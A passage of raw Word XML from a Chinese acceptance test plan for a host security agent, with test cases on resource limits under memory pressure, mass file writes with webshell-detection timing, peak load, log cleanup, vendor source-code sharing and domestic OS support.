                <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:57.75pt;width:57.75pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
                  <v:path/>
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke on="f" joinstyle="miter"/>
                  <v:imagedata r:id="rId15" o:title="oleimage"/>
                  <o:lock v:ext="edit" aspectratio="t"/>
                  <w10:wrap type="none"/>
                  <w10:anchorlock/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1468075727" r:id="rId1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Agent进程资源控制在范围内       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持Agent降级或者自杀              </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持Agent降级或者自杀后的自动恢复 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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130" w:name="_Toc676209472"/>
      <w:bookmarkStart w:id="131" w:name="_Toc5413"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存</w:t>
      </w:r>
      <w:r>
        <w:t>使用率高场景下，Agent资源使用情况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>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t>测试Agent在宿主机内存资源使用率极高的情况下的资源使用情况。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t>测试Agent在宿主机资源使用率极高的情况下，Agent是否会自动降级或自杀。当宿主机资源使用率恢复正常后，Agent是否会自动拉起自杀的进程。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t>内存使用率达到100%,发生swap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ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>1. 查看主机内存使用情况: free -m</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>2. 根据内存使用情况，计算可扩充内存的大小，可扩充内存大小=free+buffers+cached</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>3. 执行内存消耗脚本mem.out 第2步计算值，并查看内存使用情况，确认使用率达到90%以上</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>4. 30分钟以后，读取Nmon的监控数据，检查Agent进程和资源使用情况。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t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
            <w:r>
              <w:t>CPU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>单核</w:t>
            </w:r>
            <w:r>
              <w:t>使用率在10%以内</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（允许3秒内的瞬间峰值波动）内存占用小于200MB。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:t>随着</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内存</w:t>
            </w:r>
            <w:r>
              <w:t>使用率的升高，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>分钟内Agent会</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自杀或</w:t>
            </w:r>
            <w:r>
              <w:t>自动降级（需证明降级日志），并且</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>控制内存占用在200M内</w:t>
            </w:r>
            <w:r>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:t>当宿主机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内存</w:t>
            </w:r>
            <w:r>
              <w:t>使用率恢复正常后，3分钟内，能自动拉起自杀或降级的进程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Agent进程资源控制在范围内       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持Agent降级或者自杀             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持Agent降级或者自杀后的自动恢复 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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132" w:name="_Toc569135980"/>
      <w:bookmarkStart w:id="133" w:name="_Toc21044"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>模拟大量文件写入场景，Agent资源使用情况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133"/>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t>测试在web站点目录下模拟大量文件写入场景下，Agent的资源使用情况。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t>测试在大量文件写入场景下，Agent的资源占用情况，以及webshell识别的速度。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62"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>在Web站点路径下新建目录file_put,并将模拟脚本放入该目录中。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="62"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>调起脚本:python file_put.py 5 1000 10 100 ,该脚本将会持续运行5分钟，每分钟写入1000个200Kb大小的文件，并且其中5分钟内会随机写入10个webshell文件。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="62"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>记录脚本调起的时间。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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="63"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>在模拟文件写入的5分钟内，Agent的资源占用平稳，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>单核</w:t>
            </w:r>
            <w:r>
              <w:t>CPU使用率</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
            <w:r>
              <w:t>在10%以内</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（允许3秒内的瞬间峰值波动）</w:t>
            </w:r>
            <w:r>
              <w:t>，内存占用小于200M。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="63"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>在模拟文件写入的5分钟内，由于扫描恶意文件，导致Agent资源使用率异常，CPU使用率超过10%，或内存占用超过200M。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="63"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>当webshell文件落盘后1分钟内告警。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ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:object>
                <v:shape id="_x0000_i1026" o:spt="75" type="#_x0000_t75" style="height:72pt;width:72pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
                  <v:path/>
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke on="f" joinstyle="miter"/>
                  <v:imagedata r:id="rId17" o:title="oleimage"/>
                  <o:lock v:ext="edit" aspectratio="t"/>
                  <w10:wrap type="none"/>
                  <w10:anchorlock/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" DrawAspect="Icon" ObjectID="_1468075728" r:id="rId1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Agent进程资源控制在范围内         口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持webshell落盘1分钟内告警          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  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134" w:name="_Toc576252122"/>
      <w:bookmarkStart w:id="135" w:name="_Toc128"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>模拟业务高峰场景下，资源使用情况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>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t>测试在业务高峰场景下，Agent资源使用情况。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t>测试Agent在宿主机业务高峰情况下，Agent资源使用情况是否正常。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64"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>jmeter</w:t>
            </w:r>
            <w:r>
              <w:t>向Agent所在宿主机发起压力测试，保证宿主机CPU使用率达到50%。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="64"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>记录业务高峰开始时间，持续半小时。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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Agent的CPU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>使用率超过10%，内存占用超过200M。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Agent的资源使用率相比业务低峰时，无明显波动，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>控制单核</w:t>
            </w:r>
            <w:r>
              <w:t>CPU使用率在10%以内</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（允许3秒内的瞬间峰值波动）</w:t>
            </w:r>
            <w:r>
              <w:t>，内存占用小于200M。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ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:object>
                <v:shape id="_x0000_i1027" o:spt="75" type="#_x0000_t75" style="height:57.75pt;width:79.5pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
                  <v:path/>
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke on="f" joinstyle="miter"/>
                  <v:imagedata r:id="rId19" o:title=""/>
                  <o:lock v:ext="edit" aspectratio="t"/>
                  <w10:wrap type="none"/>
                  <w10:anchorlock/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1027" DrawAspect="Icon" ObjectID="_1468075729" r:id="rId1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136" w:name="_Toc31588"/>
      <w:bookmarkStart w:id="137" w:name="_Toc2065650131"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟服务端业务高峰场景下的稳定性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>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t>测试Agent服务端在业务高峰场景下的稳定性。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t>测试Agent服务端在业务高峰场景下，对服务端操作时的稳定性。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t>厂商能够提供模拟交易的接口，并且提供打压脚本。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66"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>通过厂商提供的打压脚本，向服务端发起压力流量，持续半小时，并记录开始时间。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>对所有主机进行一次风险发现扫描和数据采集操作。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>对比服务端在业务高峰期和低峰期执行步骤2所消耗的时间。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>观察服务端的稳定性，业务操作的流畅性。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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="67"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>当服务端在业务高峰时，业务操作卡顿，报错，打开或者刷新页面响应时间超过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>秒。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="67"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>服务端在业务高峰和业务低峰响应时效性相差</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不超过5秒</w:t>
            </w:r>
            <w:r>
              <w:t>，业务操作流畅，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>无明显</w:t>
            </w:r>
            <w:r>
              <w:t>卡顿，无报错</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 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bookmarkStart w:id="138" w:name="_Toc2044"/>
      <w:bookmarkStart w:id="139" w:name="_Toc664391916"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Agent文件系统使用率控制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="139"/>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t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>gent文件系统使用率控制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测试</w:t>
            </w:r>
            <w:r>
              <w:t>Agent是否</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以定期或者按文件大小清理日志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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>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r>
              <w:t>无需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68"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端设置Oracle-76-01定时存储日志周期为分钟级；旧日志会自动删除</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="68"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端设置Redhat-67-01日志文件大小最大为10K；旧日志会自动删除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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>：在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>上观察一分钟后是否每分钟生成一个备份日志</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>：在Redhat-67-01上观察是否日志大小超过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>10K</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>就生成一个日志备份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支持服务端配置日志按大小清理  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持服务端配置日志按时间周期清理  口 通过   口 未通过  口 未测试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
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码共享</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>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t>源码共享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测试厂商</w:t>
            </w:r>
            <w:r>
              <w:t>是否承诺将源码与建行共享</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>并承诺在建行的开发环境编译运行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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="69"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>厂商提供源代码</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="69"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>厂商签字盖章源码共享承诺书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Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>厂商与建行的源码共享承诺书签字盖章成功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ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:object>
                <v:shape id="_x0000_i1028" o:spt="75" type="#_x0000_t75" style="height:365.25pt;width:366pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
                  <v:path/>
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke on="f" joinstyle="miter"/>
                  <v:imagedata r:id="rId20" o:title=""/>
                  <o:lock v:ext="edit" aspectratio="t"/>
                  <w10:wrap type="none"/>
                  <w10:anchorlock/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_146807573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ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 未通过  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>国产化支持</w:t>
      </w:r>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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>国产</w:t>
            </w:r>
            <w:r>
              <w:t>化支持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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试产品对国产化操作系统的支持程度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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
